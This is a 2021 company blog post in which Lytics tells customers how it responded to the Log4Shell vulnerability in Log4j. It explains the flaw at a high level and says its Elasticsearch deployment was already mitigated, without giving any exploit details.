Our response to Log4Shell: Lytics systems and customer data uncompromised
December 15, 2021
By now you’ve probably heard more about Log4j this week than you ever have before.
On December 9 2021, the National Vulnerability Database announced the Log4Shell vulnerability (CVE-2021-44228), which some security experts call the most critical vulnerability of the last decade (a pretty impressive feat, considering that the last decade’s vulnerabilities include Heartbleed, Shellshock, and WannaCry).
Most of the software world has been quick to act in mitigating the effects of the vulnerability, thanks in large part to swift guidance from the National Vulnerability Database. Lytics was among those to take swift action to mitigate. Current internal auditing shows that access to both Lytics systems and customer data were uncompromised.
For the more inquisitive user, the rest of this post should provide some clarity on the nature of the vulnerability and the nature of the response.
What is Log4j?
Log4j is a logging library distributed by the Apache Software foundation — the same people responsible for great technologies like the Apache HTTP Server, Hadoop, Cassandra, Avro and many, many more. Developers use Log4j to help provide diagnostic information to build more reliable applications.
Who has been impacted by Log4j?
A lot of organizations and a lot of technologies.
What did the vulnerability expose?
The vulnerability allows an attacker the ability to cause malicious messages to be logged to trigger remote code execution or information leakage. Because of the simplicity of the attack vector and the prevalence of Log4j, hackers were able to execute an estimated 1.2 million attacks, ranging from cryptojacking to botnet activity.
What did we do about it?
Lytics’ only exposure to the Log4j vulnerability comes through Elasticsearch, a database that enables flexible indexing to power our segmentation engine. Fortunately, we use a modern version of Elasticsearch that already had mitigations in place such that we were not vulnerable. We still quickly implemented mitigations as recommended by upstream, just in case related vulnerabilities that are not yet public exist. We continue to monitor for any additional actions that must be taken on our part, and will consider their implementation as the highest priority.
If you have any questions regarding the security of your data, please don’t hesitate to contact your Lytics account manager.
